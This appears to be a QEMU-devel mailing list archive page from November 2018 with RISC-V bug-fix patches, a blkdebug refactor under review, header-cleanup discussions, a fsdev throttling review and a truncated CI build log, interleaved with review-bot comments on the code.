@@ -240,6 +240,7 @@ static void *create_fdt(RISCVVirtState *s, const struct 
MemmapEntry *memmap,
 qemu_fdt_setprop_cells(fdt, nodename, "reg",
 0x0, memmap[VIRT_TEST].base,
 0x0, memmap[VIRT_TEST].size);
+g_free(nodename);
 
 nodename = g_strdup_printf("/uart@%lx",
 (long)memmap[VIRT_UART0].base);
-- 
2.18.1




[Qemu-devel] [PULL 3/4] target/riscv: Fix sfence.vm/a both available in any priv version

2018-11-13 Thread Palmer Dabbelt
From: Bastian Koppelmann 

sfence.vm has been replaced in priv v1.10 spec by sfence.vma.

Reported-by: Richard Henderson 
Signed-off-by: Bastian Koppelmann 
Reviewed-by: Richard Henderson 
Signed-off-by: Palmer Dabbelt 
---
 target/riscv/translate.c | 18 +-
 1 file changed, 13 insertions(+), 5 deletions(-)

diff --git a/target/riscv/translate.c b/target/riscv/translate.c
index 5359088e24bc..f44eb9c41b48 100644
--- a/target/riscv/translate.c
+++ b/target/riscv/translate.c
@@ -1292,10 +1292,14 @@ static void gen_system(CPURISCVState *env, DisasContext 
*ctx, uint32_t opc,
 #ifndef CONFIG_USER_ONLY
 /* Extract funct7 value and check whether it matches SFENCE.VMA */
 if ((opc == OPC_RISC_ECALL) && ((csr >> 5) == 9)) {
-/* sfence.vma */
-/* TODO: handle ASID specific fences */
-gen_helper_tlb_flush(cpu_env);
-return;
+if (env->priv_ver == PRIV_VERSION_1_10_0) {
+/* sfence.vma */
+/* TODO: handle ASID specific fences */
+gen_helper_tlb_flush(cpu_env);
+return;
+} else {
+gen_exception_illegal(ctx);
+}
 }
 #endif
 
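Review bot: The new `else { gen_exception_illegal(ctx); }` arm has no `return;`, unlike the accepting branch beside it, so after the illegal-instruction exception is generated translation continues into the rest of gen_system (outside this hunk) and the rejected sfence.vma encoding is still decoded as a CSR access; if gen_exception_illegal ends the translation block this is harmless, but mirroring the `return;` in the else arm makes the intent explicit and removes the dependence on that. The enclosing gen_system starts before and ends after this hunk.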
@@ -1342,7 +1346,11 @@ static void gen_system(CPURISCVState *env, DisasContext 
*ctx, uint32_t opc,
 gen_helper_wfi(cpu_env);
 break;
 case 0x104: /* SFENCE.VM */
-gen_helper_tlb_flush(cpu_env);
+if (env->priv_ver <= PRIV_VERSION_1_09_1) {
+gen_helper_tlb_flush(cpu_env);
+} else {
+gen_exception_illegal(ctx);
+}
 break;
 #endif
 default:
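Review bot: The two version checks in this patch are not complementary: SFENCE.VM here is accepted when `env->priv_ver <= PRIV_VERSION_1_09_1`, while sfence.vma in the earlier hunk is accepted only when `env->priv_ver == PRIV_VERSION_1_10_0`, so any priv_ver value newer than 1.10, should one be added, would reject both encodings. Changing the sfence.vma test to `>= PRIV_VERSION_1_10_0` makes the two checks partition the version space. The switch this case belongs to starts outside the hunk.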
-- 
2.18.1




[Qemu-devel] [PULL 4/4] RISC-V: Respect fences for user-only emulators

2018-11-13 Thread Palmer Dabbelt
Our current fence implementation ignores fences for the user-only
configurations.  This is incorrect but unlikely to manifest: it requires
multi-threaded user-only code that takes advantage of the weakness in
the host's memory model and can be inlined by TCG.

This patch simply treats fences the same way for all our emulators.
I've given it to testing as I don't want to construct a test that would
actually trigger the failure.

Our fence implementation has an additional deficiency where we map all
RISC-V fences to full fences.  Now that we have a formal memory model
for RISC-V we can start to take advantage of the strength bits on our
fence instructions.  This requires a bit more though, so I'm going to
split it out because the implementation is still correct without taking
advantage of these weaker fences.

Thanks to Richard Henderson for pointing out both of the issues.

Signed-off-by: Palmer Dabbelt 
Reviewed-by: Alistair Francis 
Reviewed-by: Richard Henderson 
---
 target/riscv/translate.c | 2 --
 1 file changed, 2 deletions(-)

diff --git a/target/riscv/translate.c b/target/riscv/translate.c
index f44eb9c41b48..312bf298b3c2 100644
--- a/target/riscv/translate.c
+++ b/target/riscv/translate.c
@@ -1776,7 +1776,6 @@ static void decode_RV32_64G(CPURISCVState *env, 
DisasContext *ctx)
  GET_RM(ctx->opcode));
 break;
 case OPC_RISC_FENCE:
-#ifndef CONFIG_USER_ONLY
 if (ctx->opcode & 0x1000) {
 /* FENCE_I is a no-op in QEMU,
  * however we need to end the translation block */
@@ -1787,7 +1786,6 @@ static void decode_RV32_64G(CPURISCVState *env, 
DisasContext *ctx)
 /* FENCE is a full memory barrier. */
 tcg_gen_mb(TCG_MO_ALL | TCG_BAR_SC);
 }
-#endif
 break;
 case OPC_RISC_SYSTEM:
 gen_system(env, ctx, MASK_OP_SYSTEM(ctx->opcode), rd, rs1,
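Review bot: Now that this path is reachable in user-only builds as well, the existing comment `/* FENCE is a full memory barrier. */` understates what happens: the pred/succ bits of the encoding are ignored and every FENCE becomes `tcg_gen_mb(TCG_MO_ALL | TCG_BAR_SC)`, which the commit message acknowledges is deliberately stronger than the instruction requires. I would extend the comment to `/* FENCE: pred/succ are ignored and every variant is emitted as a full SC barrier; conservative but correct. */` so a later reader does not mistake it for a faithful mapping. The enclosing decode_RV32_64G starts and ends outside this hunk.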
-- 
2.18.1




[Qemu-devel] [PR RFC] RISC-V Patches for 3.1-rc2

2018-11-13 Thread Palmer Dabbelt
The following changes since commit cb968d275c145467c8b385a3618a207ec111eab1:

  Update version for v3.1.0-rc1 release (2018-11-13 18:16:14 +)

are available in the Git repository at:

  git://github.com/riscv/riscv-qemu.git tags/riscv-for-master-3.1-rc2

for you to fetch changes up to 3502dc824a7b0218abb49f4350e80a49829748cf:

  RISC-V: Respect fences for user-only emulators (2018-11-13 15:12:15 -0800)


RISC-V Patches for 3.1-rc2

This pull request contains four patches that aren't really related to
each other aside from all being bug fixes that I think should go in for
3.1.0:

* The second half of Alistair's memory leak patch set that I missed last
  week.
* A fix to make fclass.d available only on RV64IFD systems (without
  this it's available on RV32IFD systems, truncating the result).
* A fix to make sfence.vm available only in priv-1.9.1, and sfence.vma
  only available in priv-1.10.
* A change to respect fences in user-mode emulators, which were
  previously treated as NOPs.

As usual, this builds and boot Linux for me.  I don't think I have
anything else planned for 3.1.0, but I may be wrong as things are a bit
hectic this week.


Alistair Francis (1):
  hw/riscv/virt: Free the test device tree node name

Bastian Koppelmann (2):
  target/riscv: Fix FCLASS_D being treated as RV64 only
  target/riscv: Fix sfence.vm/a both available in any priv version

Palmer Dabbelt (1):
  RISC-V: Respect fences for user-only emulators

 hw/riscv/virt.c  |  1 +
 target/riscv/translate.c | 24 
 2 files changed, 17 insertions(+), 8 deletions(-)




Re: [Qemu-devel] [PATCH v3 2/3] blkdebug: Extend rule check for additional types

2018-11-13 Thread John Snow



On 11/13/18 6:34 PM, Marc Olson wrote:
> On 11/13/18 3:22 PM, John Snow wrote:
>>
>> On 11/12/18 2:06 AM, Marc Olson via Qemu-devel wrote:
>>> Break out the more common parts of the BlkdebugRule struct, and make
>>> rule_check() more explicit about operating only on error injection types
>>> so that additional rule types can be added in the future.
>>>
>>> Signed-off-by: Marc Olson 
>>> ---
>>>   block/blkdebug.c | 59
>>> +---
>>>   1 file changed, 31 insertions(+), 28 deletions(-)
>>>
>>> diff --git a/block/blkdebug.c b/block/blkdebug.c
>>> index 327049b..7739849 100644
>>> --- a/block/blkdebug.c
>>> +++ b/block/blkdebug.c
>>> @@ -73,13 +73,13 @@ typedef struct BlkdebugRule {
>>>   BlkdebugEvent event;
>>>   int action;
>>>   int state;
>>> +    int once;
>>> +    int64_t offset;
>>>   union {
>>>   struct {
>>>   int error;
>>>   int immediately;
>>> -    int once;
>>> -    int64_t offset;
>>> -    } inject;
>>> +    } inject_error;
>> ...pulling out "once" and "offset" from inject_error (renamed inject) to
>> shared properties. Fine, though this looks like it could use more love.
>> Not your doing.
>>
>> This adds new dead fields for set_state and suspend which will now work,
>> but hopefully not do anything.
> 
> 
> I think set_state was already there?
> 

Yes, I just mean to say that "once" and "offset" now get defined for
set_state tagged rules, and could theoretically be specified by the user
(I think?) I don't think it will change anything. Just pointing it out
in case anyone knows better than I do.

>>
>>>   struct {
>>>   int new_state;
>>>   } set_state;
>>> @@ -182,16 +182,16 @@ static int add_rule(void *opaque, QemuOpts
>>> *opts, Error **errp)
>>>   .state  = qemu_opt_get_number(opts, "state", 0),
>>>   };
>>>   +    rule->once = qemu_opt_get_bool(opts, "once", 0);
>>> +    sector = qemu_opt_get_number(opts, "sector", -1);
>>> +    rule->offset = sector == -1 ? -1 : sector * BDRV_SECTOR_SIZE;
>>> +
>>>   /* Parse action-specific options */
>>>   switch (d->action) {
>>>   case ACTION_INJECT_ERROR:
>>> -    rule->options.inject.error = qemu_opt_get_number(opts,
>>> "errno", EIO);
>>> -    rule->options.inject.once  = qemu_opt_get_bool(opts, "once",
>>> 0);
>>> -    rule->options.inject.immediately =
>>> +    rule->options.inject_error.error = qemu_opt_get_number(opts,
>>> "errno", EIO);
>>> +    rule->options.inject_error.immediately =
>>>   qemu_opt_get_bool(opts, "immediately", 0);
>>> -    sector = qemu_opt_get_number(opts, "sector", -1);
>>> -    rule->options.inject.offset =
>>> -    sector == -1 ? -1 : sector * BDRV_SECTOR_SIZE;
>>>   break;
>>>     case ACTION_SET_STATE:
>>> @@ -474,38 +474,41 @@ static int rule_check(BlockDriverState *bs,
>>> uint64_t offset, uint64_t bytes)
>>>   {
>>>   BDRVBlkdebugState *s = bs->opaque;
>>>   BlkdebugRule *rule = NULL;
>>> +    BlkdebugRule *error_rule = NULL;
>>>   int error;
>>>   bool immediately;
>>> +    int ret = 0;
>>>     QSIMPLEQ_FOREACH(rule, >active_rules, active_next) {
>>> -    uint64_t inject_offset = rule->options.inject.offset;
>>> -
>>> -    if (inject_offset == -1 ||
>>> -    (bytes && inject_offset >= offset &&
>>> - inject_offset < offset + bytes))
>>> +    if (rule->offset == -1 ||
>>> +    (bytes && rule->offset >= offset &&
>>> + rule->offset < offset + bytes))
>>>   {
>>> -    break;
>>> +    if (rule->action == ACTION_INJECT_ERROR) {
>>> +    error_rule = rule;
>>> +    break;
>>> +    }
>>>   }
>>>   }
>>>   -    if (!rule) {
>>> -    return 0;
>>> -    }
>>> +    if (error_rule) {
>>> +    immediately = error_rule->options.inject_error.immediately;
>>> +    error = error_rule->options.inject_error.error;
>>>   -    immediately = rule->options.inject.immediately;
>>> -    error = rule->options.inject.error;
>>> +    if (error_rule->once) {
>>> +    QSIMPLEQ_REMOVE(>active_rules, error_rule,
>>> BlkdebugRule, active_next);
>>> +    remove_rule(error_rule);
>>> +    }
>>>   -    if (rule->options.inject.once) {
>>> -    QSIMPLEQ_REMOVE(>active_rules, rule, BlkdebugRule,
>>> active_next);
>>> -    remove_rule(rule);
>>> -    }
>>> +    if (error && !immediately) {
>>> +    aio_co_schedule(qemu_get_current_aio_context(),
>>> qemu_coroutine_self());
>>> +    qemu_coroutine_yield();
>>> +    }
>>>   -    if (error && !immediately) {
>>> -    aio_co_schedule(qemu_get_current_aio_context(),
>>> qemu_coroutine_self());
>>> -    qemu_coroutine_yield();
>>> +    ret = -error;
>>>   }
>> Bit messy as a diff, but it seems to check out. As a bonus we now
>> actually check the tag of 

Re: [Qemu-devel] [PATCH v3 2/3] blkdebug: Extend rule check for additional types

2018-11-13 Thread Marc Olson via Qemu-devel

On 11/13/18 3:22 PM, John Snow wrote:


On 11/12/18 2:06 AM, Marc Olson via Qemu-devel wrote:

Break out the more common parts of the BlkdebugRule struct, and make
rule_check() more explicit about operating only on error injection types
so that additional rule types can be added in the future.

Signed-off-by: Marc Olson 
---
  block/blkdebug.c | 59 +---
  1 file changed, 31 insertions(+), 28 deletions(-)

diff --git a/block/blkdebug.c b/block/blkdebug.c
index 327049b..7739849 100644
--- a/block/blkdebug.c
+++ b/block/blkdebug.c
@@ -73,13 +73,13 @@ typedef struct BlkdebugRule {
  BlkdebugEvent event;
  int action;
  int state;
+int once;
+int64_t offset;
  union {
  struct {
  int error;
  int immediately;
-int once;
-int64_t offset;
-} inject;
+} inject_error;

...pulling out "once" and "offset" from inject_error (renamed inject) to
shared properties. Fine, though this looks like it could use more love.
Not your doing.

This adds new dead fields for set_state and suspend which will now work,
but hopefully not do anything.



I think set_state was already there?




  struct {
  int new_state;
  } set_state;
@@ -182,16 +182,16 @@ static int add_rule(void *opaque, QemuOpts *opts, Error 
**errp)
  .state  = qemu_opt_get_number(opts, "state", 0),
  };
  
+rule->once = qemu_opt_get_bool(opts, "once", 0);

+sector = qemu_opt_get_number(opts, "sector", -1);
+rule->offset = sector == -1 ? -1 : sector * BDRV_SECTOR_SIZE;
+
  /* Parse action-specific options */
  switch (d->action) {
  case ACTION_INJECT_ERROR:
-rule->options.inject.error = qemu_opt_get_number(opts, "errno", EIO);
-rule->options.inject.once  = qemu_opt_get_bool(opts, "once", 0);
-rule->options.inject.immediately =
+rule->options.inject_error.error = qemu_opt_get_number(opts, "errno", 
EIO);
+rule->options.inject_error.immediately =
  qemu_opt_get_bool(opts, "immediately", 0);
-sector = qemu_opt_get_number(opts, "sector", -1);
-rule->options.inject.offset =
-sector == -1 ? -1 : sector * BDRV_SECTOR_SIZE;
  break;
  
  case ACTION_SET_STATE:

@@ -474,38 +474,41 @@ static int rule_check(BlockDriverState *bs, uint64_t 
offset, uint64_t bytes)
  {
  BDRVBlkdebugState *s = bs->opaque;
  BlkdebugRule *rule = NULL;
+BlkdebugRule *error_rule = NULL;
  int error;
  bool immediately;
+int ret = 0;
  
  QSIMPLEQ_FOREACH(rule, >active_rules, active_next) {

-uint64_t inject_offset = rule->options.inject.offset;
-
-if (inject_offset == -1 ||
-(bytes && inject_offset >= offset &&
- inject_offset < offset + bytes))
+if (rule->offset == -1 ||
+(bytes && rule->offset >= offset &&
+ rule->offset < offset + bytes))
  {
-break;
+if (rule->action == ACTION_INJECT_ERROR) {
+error_rule = rule;
+break;
+}
  }
  }
  
-if (!rule) {

-return 0;
-}
+if (error_rule) {
+immediately = error_rule->options.inject_error.immediately;
+error = error_rule->options.inject_error.error;
  
-immediately = rule->options.inject.immediately;

-error = rule->options.inject.error;
+if (error_rule->once) {
+QSIMPLEQ_REMOVE(>active_rules, error_rule, BlkdebugRule, 
active_next);
+remove_rule(error_rule);
+}
  
-if (rule->options.inject.once) {

-QSIMPLEQ_REMOVE(>active_rules, rule, BlkdebugRule, active_next);
-remove_rule(rule);
-}
+if (error && !immediately) {
+aio_co_schedule(qemu_get_current_aio_context(), 
qemu_coroutine_self());
+qemu_coroutine_yield();
+}
  
-if (error && !immediately) {

-aio_co_schedule(qemu_get_current_aio_context(), qemu_coroutine_self());
-qemu_coroutine_yield();
+ret = -error;
  }

Bit messy as a diff, but it seems to check out. As a bonus we now
actually check the tag of the rules we're iterating through, so that
seems like an improvement.



Unfortunately git made a bit of a mess out of the diff.



Reviewed-By: John Snow 

  
-return -error;

+return ret;
  }
  
  static int coroutine_fn
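Review bot: `immediately` and `error` stay declared at the top of rule_check but are now assigned only inside the new `if (error_rule)` block, where `ret` is also set; moving both declarations into that block keeps them next to their only use and removes the maybe-uninitialized reading of the function. The order inside the block also deserves a comment, because the rule's fields are copied out before `remove_rule(error_rule)`, and if remove_rule frees the rule, as its name suggests, reading them afterwards would be a use-after-free: `/* copy the fields first: remove_rule() may free error_rule below */`. rule_check's body is complete within the hunk; the same hunk is quoted again in John Snow's reply further down this page and the note applies there too.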






Re: [Qemu-devel] [PATCH 01/13] target: arm: Add copyright boilerplate

2018-11-13 Thread Samuel Ortiz
On Tue, Nov 13, 2018 at 04:58:40PM +, Peter Maydell wrote:
> On 13 November 2018 at 16:52, Samuel Ortiz  wrote:
> > From: Philippe Mathieu-Daudé 
> >
> > Signed-off-by: Philippe Mathieu-Daudé 
> > Reviewed-by: Robert Bradford 
> > Reviewed-by: Samuel Ortiz 
> > ---
> >  target/arm/helper.c | 7 +++
> >  1 file changed, 7 insertions(+)
> >
> > diff --git a/target/arm/helper.c b/target/arm/helper.c
> > index 0da1424f72..3d4e9c5c8a 100644
> > --- a/target/arm/helper.c
> > +++ b/target/arm/helper.c
> > @@ -1,3 +1,10 @@
> > +/*
> > + * ARM generic helpers.
> > + *
> > + * This code is licensed under the GNU GPL v2.
> > + *
> > + * SPDX-License-Identifier: GPL-2.0-or-later
> > + */
> 
> The human readable text says "v2", but the SPDX tag says
> "v2 or later". Which is right? (The top level LICENSE file says
> source files with no specific license are 2-or-later).
Fixed in my
https://github.com/intel/nemu/tree/topic/upstream/arm-tcg-disable
branch, thanks.

Cheers,
Samuel.




Re: [Qemu-devel] [PATCH 02/13] target: arm: Remove unused headers

2018-11-13 Thread Samuel Ortiz
Hi Philippe,

On Tue, Nov 13, 2018 at 07:02:57PM +0100, Philippe Mathieu-Daudé wrote:
> On 13/11/18 18:01, Peter Maydell wrote:
> > On 13 November 2018 at 16:52, Samuel Ortiz  wrote:
> > > From: Philippe Mathieu-Daudé 
> > > 
> > > Signed-off-by: Philippe Mathieu-Daudé 
> > > Reviewed-by: Robert Bradford 
> > > Reviewed-by: Samuel Ortiz 
> > > ---
> > >   target/arm/helper.c | 3 ---
> > >   1 file changed, 3 deletions(-)
> > > 
> > > diff --git a/target/arm/helper.c b/target/arm/helper.c
> > > index 3d4e9c5c8a..27d9285e1e 100644
> > > --- a/target/arm/helper.c
> > > +++ b/target/arm/helper.c
> > > @@ -12,13 +12,10 @@
> > >   #include "internals.h"
> > >   #include "exec/gdbstub.h"
> > >   #include "exec/helper-proto.h"
> > > -#include "qemu/host-utils.h"
> > 
> > This is for muldiv64().
> 
> But it is already included by "cpu.h" -> "exec/cpu-defs.h"
> 
> > 
> > >   #include "sysemu/arch_init.h"
> > >   #include "sysemu/sysemu.h"
> > > -#include "qemu/bitops.h"
> 
> "cpu.h" -> "cpu-qom.h" -> "qom/cpu.h" -> "qemu/bitmap.h"
> 
> > 
> > This is for extract32() and friends.
> > 
> > >   #include "qemu/crc32c.h"
> > >   #include "exec/exec-all.h"
> > > -#include "exec/cpu_ldst.h"
> > 
> > This is for cpu_stl_data().
> 
> Included by "arm_ldst.h"
> 
> > 
> > >   #include "arm_ldst.h"
> > >   #include  /* For crc32 */
> > >   #include "exec/semihost.h"
> 
> So they are not "unused" but "unnecessary".
> 
> I thought this would be better to clean this once, before Samuel split.
> 
> Samuel: please drop this patch from your series.
Dropped. I updated my
https://github.com/intel/nemu/tree/topic/upstream/arm-tcg-disable branch
accordingly. I will wait for Richard's review before sending a v2.

Cheers,
Samuel.



Re: [Qemu-devel] [PATCH v2 1/3] fsdev-throttle-qmp: refactor code for qmp interface for io throttling

2018-11-13 Thread Eric Blake

On 11/13/18 6:12 AM, xiezhide wrote:

This patch includes two parts:
1. factor out throttle code to reuse code
2. use ThrottleLimits structure


Any time your patch mentions two independent things, you have to ask if 
that can be two independent patches.  It's fine if they are too 
intertwined to separate, but giving more justification never hurts.




Signed-off-by: xiezhide 
---
  Makefile|  20 +++-
  Makefile.objs   |   8 ++
  block/throttle.c|   6 +-
  blockdev.c  |  96 +
  include/qemu/throttle-options.h |   3 +-
  include/qemu/throttle.h |   4 +-
  include/qemu/typedefs.h |   1 +
  qapi/block-core.json| 122 +-
  qapi/fsdev.json |  20 
  qapi/qapi-schema.json   |   1 +
  qapi/tlimits.json   |  89 
  util/throttle.c | 224 ++--
  12 files changed, 298 insertions(+), 296 deletions(-)
  create mode 100644 qapi/fsdev.json
  create mode 100644 qapi/tlimits.json


Still feels big; I don't know if it can be easily split into 
easier-to-manage patches, but it may be worth the effort.  For example, 
why are you adding both fsdev.json AND tlimits.json in the same patch?




diff --git a/Makefile b/Makefile
index f294718..9ae2460 100644
--- a/Makefile
+++ b/Makefile
@@ -94,6 +94,7 @@ GENERATED_FILES += qapi/qapi-types-block-core.h 
qapi/qapi-types-block-core.c
  GENERATED_FILES += qapi/qapi-types-block.h qapi/qapi-types-block.c
  GENERATED_FILES += qapi/qapi-types-char.h qapi/qapi-types-char.c
  GENERATED_FILES += qapi/qapi-types-common.h qapi/qapi-types-common.c
+GENERATED_FILES += qapi/qapi-types-tlimits.h qapi/qapi-types-tlimits.c
  GENERATED_FILES += qapi/qapi-types-crypto.h qapi/qapi-types-crypto.c
  GENERATED_FILES += qapi/qapi-types-introspect.h qapi/qapi-types-introspect.c
  GENERATED_FILES += qapi/qapi-types-job.h qapi/qapi-types-job.c


[Hmm - ages ago, I threatened to refactor this so there was a lot less 
manual duplication when adding a new file. I should return to that thread]


Please keep this list quasi-sorted (tlimits does NOT fall between common 
and crypto, but later in the list).



@@ -107,12 +108,14 @@ GENERATED_FILES += qapi/qapi-types-tpm.h 
qapi/qapi-types-tpm.c
  GENERATED_FILES += qapi/qapi-types-trace.h qapi/qapi-types-trace.c
  GENERATED_FILES += qapi/qapi-types-transaction.h qapi/qapi-types-transaction.c
  GENERATED_FILES += qapi/qapi-types-ui.h qapi/qapi-types-ui.c
+GENERATED_FILES += qapi/qapi-types-fsdev.h qapi/qapi-types-fsdev.c


Likewise, fsdev should appear earlier, way before ui.



@@ -598,7 +606,9 @@ qapi-modules = $(SRC_PATH)/qapi/qapi-schema.json 
$(SRC_PATH)/qapi/common.json \
 $(SRC_PATH)/qapi/tpm.json \
 $(SRC_PATH)/qapi/trace.json \
 $(SRC_PATH)/qapi/transaction.json \
-   $(SRC_PATH)/qapi/ui.json
+   $(SRC_PATH)/qapi/ui.json \
+   $(SRC_PATH)/qapi/fsdev.json \
+   $(SRC_PATH)/qapi/tlimits.json


Another sorted list that you managed to scramble.


+++ b/Makefile.objs
@@ -8,6 +8,7 @@ util-obj-y += qapi/qapi-types-block-core.o
  util-obj-y += qapi/qapi-types-block.o
  util-obj-y += qapi/qapi-types-char.o
  util-obj-y += qapi/qapi-types-common.o
+util-obj-y += qapi/qapi-types-tlimits.o
  util-obj-y += qapi/qapi-types-crypto.o


And more instances of poor sorting.


+++ b/block/throttle.c
@@ -41,7 +41,7 @@ static QemuOptsList throttle_opts = {
   * @group and must be freed by the caller.
   * If there's an error then @group remains unmodified.
   */
-static int throttle_parse_options(QDict *options, char **group, Error **errp)
+static int throttle_parse_group(QDict *options, char **group, Error **errp)


Why the function rename? Can that be its own patch?


+++ b/blockdev.c
@@ -400,48 +400,7 @@ static void extract_common_blockdev_options(QemuOpts 
*opts, int *bdrv_flags,
  }
  
  if (throttle_cfg) {

-throttle_config_init(throttle_cfg);
-throttle_cfg->buckets[THROTTLE_BPS_TOTAL].avg =
-qemu_opt_get_number(opts, "throttling.bps-total", 0);



-throttle_cfg->op_size =
-qemu_opt_get_number(opts, "throttling.iops-size", 0);
+throttle_parse_options(throttle_cfg, opts);


Okay, here, it looks like you are doing a code motion refactor - taking 
lots of lines of code, and putting them in a new function 
throttle_parse_options.  If that's all the patch does, great; but when 
it starts to mix in other things, it is hard to review.


  
  if (!throttle_is_valid(throttle_cfg, errp)) {

  return;
@@ -2725,6 +2684,7 @@ void qmp_block_set_io_throttle(BlockIOThrottle *arg, 
Error **errp)
  BlockDriverState *bs;
  BlockBackend *blk;
  AioContext *aio_context;
+ThrottleLimits *tlimits;


Do you need this new variable, or...


@@ -2742,56 +2702,8 @@ 

Re: [Qemu-devel] [PATCH v3 2/3] blkdebug: Extend rule check for additional types

2018-11-13 Thread John Snow



On 11/12/18 2:06 AM, Marc Olson via Qemu-devel wrote:
> Break out the more common parts of the BlkdebugRule struct, and make
> rule_check() more explicit about operating only on error injection types
> so that additional rule types can be added in the future.
> 
> Signed-off-by: Marc Olson 
> ---
>  block/blkdebug.c | 59 
> +---
>  1 file changed, 31 insertions(+), 28 deletions(-)
> 
> diff --git a/block/blkdebug.c b/block/blkdebug.c
> index 327049b..7739849 100644
> --- a/block/blkdebug.c
> +++ b/block/blkdebug.c
> @@ -73,13 +73,13 @@ typedef struct BlkdebugRule {
>  BlkdebugEvent event;
>  int action;
>  int state;
> +int once;
> +int64_t offset;
>  union {
>  struct {
>  int error;
>  int immediately;
> -int once;
> -int64_t offset;
> -} inject;
> +} inject_error;

...pulling out "once" and "offset" from inject_error (renamed inject) to
shared properties. Fine, though this looks like it could use more love.
Not your doing.

This adds new dead fields for set_state and suspend which will now work,
but hopefully not do anything.

>  struct {
>  int new_state;
>  } set_state;
> @@ -182,16 +182,16 @@ static int add_rule(void *opaque, QemuOpts *opts, Error 
> **errp)
>  .state  = qemu_opt_get_number(opts, "state", 0),
>  };
>  
> +rule->once = qemu_opt_get_bool(opts, "once", 0);
> +sector = qemu_opt_get_number(opts, "sector", -1);
> +rule->offset = sector == -1 ? -1 : sector * BDRV_SECTOR_SIZE;
> +
>  /* Parse action-specific options */
>  switch (d->action) {
>  case ACTION_INJECT_ERROR:
> -rule->options.inject.error = qemu_opt_get_number(opts, "errno", EIO);
> -rule->options.inject.once  = qemu_opt_get_bool(opts, "once", 0);
> -rule->options.inject.immediately =
> +rule->options.inject_error.error = qemu_opt_get_number(opts, 
> "errno", EIO);
> +rule->options.inject_error.immediately =
>  qemu_opt_get_bool(opts, "immediately", 0);
> -sector = qemu_opt_get_number(opts, "sector", -1);
> -rule->options.inject.offset =
> -sector == -1 ? -1 : sector * BDRV_SECTOR_SIZE;
>  break;
>  
>  case ACTION_SET_STATE:
> @@ -474,38 +474,41 @@ static int rule_check(BlockDriverState *bs, uint64_t 
> offset, uint64_t bytes)
>  {
>  BDRVBlkdebugState *s = bs->opaque;
>  BlkdebugRule *rule = NULL;
> +BlkdebugRule *error_rule = NULL;
>  int error;
>  bool immediately;
> +int ret = 0;
>  
>  QSIMPLEQ_FOREACH(rule, >active_rules, active_next) {
> -uint64_t inject_offset = rule->options.inject.offset;
> -
> -if (inject_offset == -1 ||
> -(bytes && inject_offset >= offset &&
> - inject_offset < offset + bytes))
> +if (rule->offset == -1 ||
> +(bytes && rule->offset >= offset &&
> + rule->offset < offset + bytes))
>  {
> -break;
> +if (rule->action == ACTION_INJECT_ERROR) {
> +error_rule = rule;
> +break;
> +}
>  }
>  }
>  
> -if (!rule) {
> -return 0;
> -}
> +if (error_rule) {
> +immediately = error_rule->options.inject_error.immediately;
> +error = error_rule->options.inject_error.error;
>  
> -immediately = rule->options.inject.immediately;
> -error = rule->options.inject.error;
> +if (error_rule->once) {
> +QSIMPLEQ_REMOVE(>active_rules, error_rule, BlkdebugRule, 
> active_next);
> +remove_rule(error_rule);
> +}
>  
> -if (rule->options.inject.once) {
> -QSIMPLEQ_REMOVE(>active_rules, rule, BlkdebugRule, active_next);
> -remove_rule(rule);
> -}
> +if (error && !immediately) {
> +aio_co_schedule(qemu_get_current_aio_context(), 
> qemu_coroutine_self());
> +qemu_coroutine_yield();
> +}
>  
> -if (error && !immediately) {
> -aio_co_schedule(qemu_get_current_aio_context(), 
> qemu_coroutine_self());
> -qemu_coroutine_yield();
> +ret = -error;
>  }

Bit messy as a diff, but it seems to check out. As a bonus we now
actually check the tag of the rules we're iterating through, so that
seems like an improvement.

Reviewed-By: John Snow 

>  
> -return -error;
> +return ret;
>  }
>  
>  static int coroutine_fn
> 




Re: [Qemu-devel] [PATCH v2 0/3] fsdev-throttle-qmp: qmp interface for fsdev io throttling

2018-11-13 Thread no-reply
Hi,

This series failed docker-quick@centos7 build test. Please find the testing 
commands and
their output below. If you have Docker installed, you can probably reproduce it
locally.

Type: series
Message-id: cover.1542110461.git.xiezh...@huawei.com
Subject: [Qemu-devel] [PATCH v2 0/3] fsdev-throttle-qmp: qmp interface for 
fsdev io throttling

=== TEST SCRIPT BEGIN ===
#!/bin/bash
time make docker-test-quick@centos7 SHOW_ENV=1 J=8
=== TEST SCRIPT END ===

Updating 3c8cf5a9c21ff8782164d1def7f44bd888713384
Switched to a new branch 'test'
fa53c78941 fsdev-throttle-qmp: hmp interface for fsdev io throttling
468c324722 fsdev-throttle-qmp: qmp interface for fsdev io throttling
e0698a59db fsdev-throttle-qmp: refactor code for qmp interface for io throttling

=== OUTPUT BEGIN ===
  BUILD   centos7
make[1]: Entering directory '/var/tmp/patchew-tester-tmp-iuk2n7nv/src'
  GEN 
/var/tmp/patchew-tester-tmp-iuk2n7nv/src/docker-src.2018-11-13-17.53.03.16071/qemu.tar
Cloning into 
'/var/tmp/patchew-tester-tmp-iuk2n7nv/src/docker-src.2018-11-13-17.53.03.16071/qemu.tar.vroot'...
done.
Checking out files:  45% (2965/6457)   
Checking out files:  46% (2971/6457)   
Checking out files:  47% (3035/6457)   
Checking out files:  48% (3100/6457)   
Checking out files:  49% (3164/6457)   
Checking out files:  50% (3229/6457)   
Checking out files:  51% (3294/6457)   
Checking out files:  52% (3358/6457)   
Checking out files:  53% (3423/6457)   
Checking out files:  54% (3487/6457)   
Checking out files:  55% (3552/6457)   
Checking out files:  56% (3616/6457)   
Checking out files:  57% (3681/6457)   
Checking out files:  58% (3746/6457)   
Checking out files:  59% (3810/6457)   
Checking out files:  60% (3875/6457)   
Checking out files:  61% (3939/6457)   
Checking out files:  62% (4004/6457)   
Checking out files:  63% (4068/6457)   
Checking out files:  64% (4133/6457)   
Checking out files:  65% (4198/6457)   
Checking out files:  66% (4262/6457)   
Checking out files:  67% (4327/6457)   
Checking out files:  68% (4391/6457)   
Checking out files:  69% (4456/6457)   
Checking out files:  70% (4520/6457)   
Checking out files:  71% (4585/6457)   
Checking out files:  72% (4650/6457)   
Checking out files:  73% (4714/6457)   
Checking out files:  74% (4779/6457)   
Checking out files:  75% (4843/6457)   
Checking out files:  76% (4908/6457)   
Checking out files:  77% (4972/6457)   
Checking out files:  78% (5037/6457)   
Checking out files:  79% (5102/6457)   
Checking out files:  80% (5166/6457)   
Checking out files:  81% (5231/6457)   
Checking out files:  82% (5295/6457)   
Checking out files:  83% (5360/6457)   
Checking out files:  84% (5424/6457)   
Checking out files:  85% (5489/6457)   
Checking out files:  86% (5554/6457)   
Checking out files:  87% (5618/6457)   
Checking out files:  88% (5683/6457)   
Checking out files:  89% (5747/6457)   
Checking out files:  90% (5812/6457)   
Checking out files:  91% (5876/6457)   
Checking out files:  92% (5941/6457)   
